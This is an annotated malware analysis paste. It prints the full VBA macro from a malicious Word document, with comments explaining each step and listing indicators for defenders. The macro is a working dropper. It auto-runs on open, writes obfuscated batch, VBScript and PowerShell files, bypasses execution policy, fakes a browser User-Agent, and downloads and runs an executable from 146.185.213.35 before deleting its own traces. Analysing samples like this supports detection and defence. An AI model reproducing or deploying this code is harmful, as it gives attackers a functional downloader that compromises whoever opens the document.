Untitled

Feb 3rd, 2015
  1. hi from techhelplist.com
  2.  
  3. Macro extracted from the malicious .doc (VirusTotal report):
  4. https://www.virustotal.com/en/file/44175230b4e479dcce1b82c27d762a890626606fb34debb4d1cf939c344e9572/analysis/
  5.  
  6. Downloads its payload from 146.185.213.35/upd/install.exe (VirusTotal report):
  7. https://www.virustotal.com/en/file/5cfbc395d95347350e85fafb3d15e811350b18dce1e2abfe981ed59449c5ecdd/analysis/
  8.  
  9. ---------------------------------------------
  10.  
' Module header. "Rem Attribute VBA_ModuleType=..." and "Option VBASupport 1"
' look like LibreOffice Basic compatibility markers, which would mean this
' listing was exported through LibreOffice rather than taken from Word directly
' — TODO confirm; they do not affect what the macro does.
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
' Auto-execution entry point: Word runs Auto_Open as soon as the document is
' opened with macros enabled. All of the work is delegated to h().
Sub Auto_Open()
    h
End Sub
' Main dropper routine.
'
' What it does, in order (everything below is visible in the code itself):
'   1. Builds file names of the form adobeacd-update.{ps1,vbs,bat} and
'      adobeacd-updatexp.vbs from string fragments and Chr() arithmetic.
'   2. Deletes any previous copies from %LOCALAPPDATA%\Temp and C:\Windows\Temp.
'   3. Queries Win32_OperatingSystem over WMI to learn the OS version.
'   4. On Windows 5.x: drops a .bat + .vbs into C:\Windows\Temp; the .vbs
'      fetches http://146.185.213.35/upd/install.exe with MSXML2.XMLHTTP and
'      ADODB.Stream, saves it as 444.exe and the .bat runs it.
'      On Windows 6.x+: drops .ps1 + .vbs + .bat into the user's Temp; the
'      .bat runs cscript on the .vbs, which runs powershell.exe
'      -ExecutionPolicy bypass on the .ps1, which downloads the same URL via
'      System.Net.WebClient, runs it and removes the dropped files.
'   5. Launches the chain with Shell(..., 0) (hidden window).
'   6. Edits the host document so the lure text between <select>/<inbox>
'      tags becomes readable, and strips the tags.
'
' Detection points for defenders (all from the lines below):
'   - WINWORD.EXE spawning cmd.exe / cscript.exe / powershell.exe, the latter
'     with "-ExecutionPolicy bypass -noprofile -file".
'   - File creation of adobeacd-update.* / 444.exe under ...\AppData\Local\Temp
'     or C:\Windows\Temp.
'   - Office process issuing a WMI query for Win32_OperatingSystem.
'   - Outbound HTTP GET to 146.185.213.35 from a Windows host presenting a
'     Macintosh Safari User-Agent.
Sub h()
    ' Unused declarations and junk string assignments (LKASJDKA, ASJDKHSJADASDSA,
    ' KALJSKAD, PIKUIASD, ...) are scattered throughout; they have no effect and
    ' presumably exist only to change the module's static signature.
    Dim MY_FIWQJOIDJAS, ASIJKDAJKDSJSAKLJKJKSA, AKSJDJLKSJADJKS, ASJKDJLSAL
    LKASJDKA = "klasdljasdjklkjsd a jsdakjksjklsdajsadjlks jlkjk asjk"
    Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
    ' Environ("username"), with the variable name split so it is not a literal.
    USER = Environ("" & "u" & "s" & "er" & "na" & "me")
    ' ds is only a base for the Chr(ds + n) arithmetic used below.
    ds = 100
    jks = ds

    ' Base names. Chr(100) = "d", so PST2, VBT2 and BART2 all resolve to
    ' "adobeacd-update" and VBTXP2 to "adobeacd-updatexp".
    PST2 = "a" + "dobe" & "acd-u" & "pdate"
    VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
    VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
    BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"

    ' Extensions: Chr(ds + 15) = "s", Chr(118) = "v", Chr(46) = ".",
    ' Chr(98) = "b", Chr(ds + 16) = "t".  Resulting names:
    '   PST1  = adobeacd-update.ps1
    '   VBT1  = adobeacd-update.vbs
    '   VBTXP = adobeacd-updatexp.vbs
    '   BART  = adobeacd-update.bat
    PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
    VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
    VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
    BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""

    ' Drop locations (file-path IoCs). The Vista+ set lives in the user's
    ' profile, the XP-era set in C:\Windows\Temp.
    '   MY_FILENDIR = c:\Users\<USER>\AppData\Local\Temp\adobeacd-update.ps1
    '   ASDASDSA    = c:\Users\<USER>\AppData\Local\Temp\adobeacd-update.bat
    '   MY_FILDIR   = c:\Users\<USER>\AppData\Local\Temp\adobeacd-update.vbs
    '   XPFILEDIR   = c:\Windows\Temp\adobeacd-updatexp.vbs
    '   TRT/KRT/HYF = c:\Windows\Temp\adobeacd-update.bat
    MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
    ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
    ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
    MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
    XPFILEDIR = "c:\Windows\Temp\" + VBTXP
    TRT = "c:\Windows\Temp\" + BART
    KRT = TRT
    HYF = KRT

    ' Clean up leftovers from an earlier run. On Error Resume Next stays in
    ' force for the rest of the procedure (the repeated statements below are
    ' redundant), so from here on every runtime error is silently swallowed.
    On Error Resume Next
    SetAttr MY_FILENDIR, vbNormal

    If (Len(Dir(MY_FILENDIR)) <> 0) Then
        Kill MY_FILENDIR
    End If

    On Error Resume Next
    SetAttr ASDASDSA, vbNormal
    If (Dir(ASDASDSA) <> "") Then
        Kill ASDASDSA
    End If

    On Error Resume Next
    SetAttr MY_FILDIR, vbNormal
    If (Dir(MY_FILDIR) <> "") Then
        Kill MY_FILDIR
    End If

    On Error Resume Next
    SetAttr XPFILEDIR, vbNormal
    If (Dir(XPFILEDIR) <> "") Then
        Kill XPFILEDIR
    End If

    ' File handles. All FreeFile calls happen before any Open, so they appear
    ' to yield the same number; that only works because each dropped file is
    ' closed before the next one is opened.
    Dim FileNumber As Integer
    Dim FileNumb As Integer
    Dim FileNu As Integer
    Dim FileNuG As Integer
    Dim FileNukk As Integer
    Dim FileNs As Integer
    Dim mttt As Integer
    Dim retVal As Variant
    Dim jskw As Integer
    FileNumber = FreeFile
    FileNumb = FreeFile
    FileNu = FreeFile
    FileNukk = FreeFile
    FileNs = FreeFile
    FileNuG = FreeFile
    ' OS fingerprinting over WMI. SysReport is assembled but never used; the
    ' second, identical query keeps only the Version string.
    Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
        objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
    Next

    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next


    ' Val() stops at the second ".", so "6.1.7601" becomes 6.1 and "5.1.2600"
    ' becomes 5.1. jskw is an Integer, so those round to 6 and 5. The 5.5
    ' threshold therefore separates NT 5.x (XP / Server 2003 era) from 6.x+.
    winver = Val(winverstr)
    WaitFor (1)
    jskw = winver

    ' ---- Windows 5.x branch: .bat + .vbs in C:\Windows\Temp ----
    If (jskw <= 5.5) Then
        ' adobeacd-update.bat: ping as a delay, cscript.exe on the .vbs,
        ' launch c:\Windows\Temp\444.exe, then loop deleting the .vbs and
        ' itself until both are gone.
        Open HYF For Output As #FileNuG
        Print #FileNuG, "@echo off"
        Print #FileNuG, "ping 2.2.1.1 -n" & " 2" + ""
        Print #FileNuG, ":ksadatk"
        KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
        PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
        Print #FileNuG, ":kcscriptw"
        Print #FileNuG, ":asdsadas"
        Print #FileNuG, ":cscripdiqwojd"
        Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
        Print #FileNuG, "ping 2.2.1.1 -n" & " 2" + ""
        KDJFKLSAJKJDSOIIJEDF = "kljsadjkdsajkl jaskksj ksaljd ksaj dlksajd ksajd k" + "asdsaasdsa " & "1io9843ytiurewhf"
        PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
        Print #FileNuG, "" & ":windows"
        KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
        PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
        Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + Chr(Asc("e"))
        Print #FileNuG, ":loop"
        Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
        Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
        Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
        Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
        Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
        Print #FileNuG, "exit"
        Close #FileNuG

        WaitFor (2)
        ' mttt = 88 ("X") seeds the Chr() arithmetic for the object name below.
        mttt = 88
        SJIQWD = ".35/upd/install"

        ' adobeacd-updatexp.vbs: strRT = "http://146.185.213.35/upd/install.exe",
        ' strTecation = "c:\Windows\Temp\444.exe". Chr(88)(77)(76)(72)(84)(84)(80)
        ' spells "XMLHTTP" and Chr(34) is the closing quote, so the object
        ' created is "MSXML2.XMLHTTP"; the body is saved through ADODB.Stream.
        Open XPFILEDIR For Output As #FileNumber
        Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213" + SJIQWD + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
        Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

        Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
        ' Leftover, commented-out variant of the line above (kept as in the sample).
        'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"

        Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

        Print #FileNumber, "objXMLHTTP.send() "
        Print #FileNumber, "If objXMLHTTP.Status = 200 Then"

        Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "A" + "D" + "OD" + "B.S" + "tream" + Chr(34) + ") "

        Print #FileNumber, "objADOStream.Open "
        Print #FileNumber, "objADOStream.Type = 1"
        Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
        Print #FileNumber, "objADOStream.Position = 0 "
        Print #FileNumber, "objADOStream.SaveToFile strTecation "
        Print #FileNumber, "objADOStream.Close "
        Print #FileNumber, "Set objADOStream = Nothing "
        Print #FileNumber, "End if "
        Print #FileNumber, "Set objXMLHTTP = Nothing"
        ' A WScript.Shell object is created in the .vbs but never used there.
        Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
        Close #FileNumber

        WaitFor (1)

        ' Run the batch file with window style 0 (hidden).
        ASKJD = TRT
        retVal = Shell(ASKJD, 0)

    End If


    ' ---- Windows 6.x+ branch: .bat -> cscript .vbs -> powershell .ps1 ----
    If (winver > 5.5) Then
        ' adobeacd-update.ps1 (decoded):
        '   $down = New-Object System.Net.WebClient;
        '   $url  = 'http://146.185.213.35/upd/install.exe';
        '   $file = 'c:\Users\<USER>\AppData\Local\Temp\444.exe';
        '   User-Agent spoofed as Safari on Mac OS X 10.10, then
        '   $down.DownloadFile($url,$file); Start-Sleep -s 15;
        '   cmd.exe /c '...\444.exe'; then Remove-Item on the .vbs, .bat, .exe
        '   and on $MyInvocation.InvocationName (the script deletes itself).
        ' Chr(39) + Chr(43) + Chr(39) emits '+', so the paths appear in the
        ' PowerShell source as 'adobeacd-update'+'.'+'v'+'bs' and similar.
        Open MY_FILENDIR For Output As #FileNumber
        Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
        Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://146.185.213" + Chr(Asc(".")) + "35/upd/install" & ".e" & "x" + "e';"
        Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
        Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
        Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
        Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
        Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"

        Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
        ' Note the ";" after BART2: in a Print # statement it is an item
        ' separator, so the output is the same concatenated line.
        Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
        Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"

        Print #FileNumber, "Start-Sleep -s 15;"
        PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH HJKAHJSA JK"
        PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH HJKAHJKASHDJSA JK"
        Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
        Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
        Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
        Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
        Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
        Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
        Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
        Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
        Close #FileNumber

        ' adobeacd-update.vbs (decoded): computes its own directory, sets
        ' currentFile = "C:\Users\<USER>\AppData\Local\Temp\adobeacd-update"&"."&"p"&"s1",
        ' creates Wscript.shell (Chr(83)="S", Chr(111)="o", Chr(115)="s") and runs
        '   powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file <currentFile>
        ' with window style 0 and wait = true.
        Open MY_FILDIR For Output As #FileNumb
        Print #FileNumb, "Dim dff"
        Print #FileNumb, "dff = 68"
        Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
        ' Chr("&") passes a non-numeric string to Chr; that likely raises a type
        ' mismatch, which On Error Resume Next swallows so this Print is skipped.
        ' The generated script never references objFSO, so nothing is lost.
        Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
        Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
        Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
        Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
        Close #FileNumb

        ' adobeacd-update.bat (decoded): "chcp 1251" (the Windows Cyrillic code
        ' page), then cscript.exe "...\adobeacd-update"%Var1%%Var2%%Var3% where
        ' the three variables hold ".", "v" and "bs" — so the .vbs extension never
        ' appears as one literal in the batch file.
        Open ASDASDSA For Output As #FileNs
        Print #FileNs, "@echo off"
        Print #FileNs, "ping 1.1.2.2 -n" & " 2"
        Print #FileNs, "chcp 1251"
        Print #FileNs, ":csakclasjdklas"
        Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
        Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
        Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
        Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
        Print #FileNs, "exit"
        Close #FileNs

        SetAttr MY_FILENDIR, vbNormal
        SetAttr ASDASDSA, vbNormal
        SetAttr MY_FILDIR, vbNormal

        ' Run the batch file with window style 0 (hidden).
        WaitFor (1)
        SJAKLD = ASDASDSA
        retVal = Shell(SJAKLD, 0)
    End If


    ' Document clean-up: findTest deletes the text between <select> and
    ' </select>, secondTest recolours the text between <inbox> and </inbox>
    ' black, and the four loops below blank out the tags themselves in every
    ' story range. Presumably this turns a "please enable content" lure into
    ' the readable document the victim expected — TODO confirm against the .doc.
    findTest
    secondTest
    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "<" & "sel" & "ect>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange

    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "</s" & "ele" & "ct>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange

    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "<" & "in" & "box>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange

    For Each myStoryRange In ActiveDocument.StoryRanges
        With myStoryRange.Find
            .Text = "</" & "in" & "box>"
            .Replacement.Text = " "
            .Wrap = wdFindContinue
            .Execute Replace:=wdReplaceAll
        End With
    Next myStoryRange


End Sub
' Busy-wait for roughly NumOfSeconds seconds. Timer is the seconds-since-
' midnight clock, so the loop spins on DoEvents (which keeps Word responsive)
' until that clock passes the target. h() calls this between writing the
' dropped files and launching them.
Sub WaitFor(NumOfSeconds As Long)
    Dim SngSec As Long
    ' SngSec is a Long, so the fractional part of Timer is dropped; the wait
    ' is approximate.
    SngSec = Timer + NumOfSeconds

    Do While Timer < SngSec
        DoEvents
    Loop

End Sub
  277.  
' Alternate Word auto-exec name; funnels into Auto_Open so the payload fires
' whichever entry point the host honours.
Sub AutoOpen()
    Auto_Open
End Sub
' Excel's workbook-open event name, also routed to Auto_Open — the same module
' is meant to run if it is ever embedded in a workbook instead of a document.
Sub Workbook_Open()
    Auto_Open
End Sub
' Deletes the document text enclosed between the first "<select>" and the
' following "</select>" (the tags are split across string fragments so they do
' not appear as literals). The tags themselves are removed later in h().
' The junk assignments (ASKASAIEJ, ASKUKKIEJ, ASKSASADW) have no effect.
Sub findTest()
    Dim firstTerm As String
    Dim secondTerm As String
    Dim rrtt As Range
    Dim selRange As Range
    Dim selectedText As String

    Set rrtt = ActiveDocument.Range
    firstTerm = "<" + "s" + "e" & "le" + "ct>"
    secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
    ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
    With rrtt.Find
        ' Locate the opening tag and collapse to its end; that becomes the
        ' start of the span to delete.
        .Text = firstTerm
        .MatchWholeWord = True
        .Execute
        ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
        rrtt.Collapse direction:=wdCollapseEnd
        Set selRange = ActiveDocument.Range
        selRange.Start = rrtt.End
        ' Locate the closing tag and collapse to its start; that ends the span.
        .Text = secondTerm
        .MatchWholeWord = True
        .Execute
        ASKSASADW = "asjldklas"
        rrtt.Collapse direction:=wdCollapseStart
        selRange.End = rrtt.Start
        ' Range.Delete removes the span; the value assigned to selectedText is
        ' incidental and never read.
        selectedText = selRange.Delete
    End With
End Sub
  312.  
' Same range-finding pattern as findTest, but for "<inbox>" ... "</inbox>":
' instead of deleting the enclosed text it sets its font colour to black.
' Presumably that text was hidden (e.g. white on white) in the lure and only
' becomes readable once macros run — TODO confirm against the .doc.
Sub secondTest()
    Dim firstTerm As String
    Dim secondTerm As String
    Dim myRanget As Range
    Dim yytt As Range
    Dim selRanget As Range
    Dim selectedTextt As String

    Set yytt = ActiveDocument.Range
    firstTerm = "<" + "in" & "bo" + "x>"
    secondTerm = "</" + "in" & "bo" + "x>"
    With yytt.Find
        ' Opening tag: collapse to its end to start the target span.
        .Text = firstTerm
        .MatchWholeWord = True
        .Execute
        ASKIEJ = "ask as8d j dnkjh12kh1 sad"
        yytt.Collapse direction:=wdCollapseEnd

        Set selRanget = ActiveDocument.Range
        selRanget.Start = yytt.End
        ' Closing tag: collapse to its start to end the target span.
        .Text = secondTerm
        .MatchWholeWord = True
        .Execute

        yytt.Collapse direction:=wdCollapseStart
        selRanget.End = yytt.Start
        ' selectedTextt is assigned but never used; the visible effect is the
        ' colour change on the next line.
        selectedTextt = selRanget
        selRanget.Font.Color = wdColorBlack
    End With
End Sub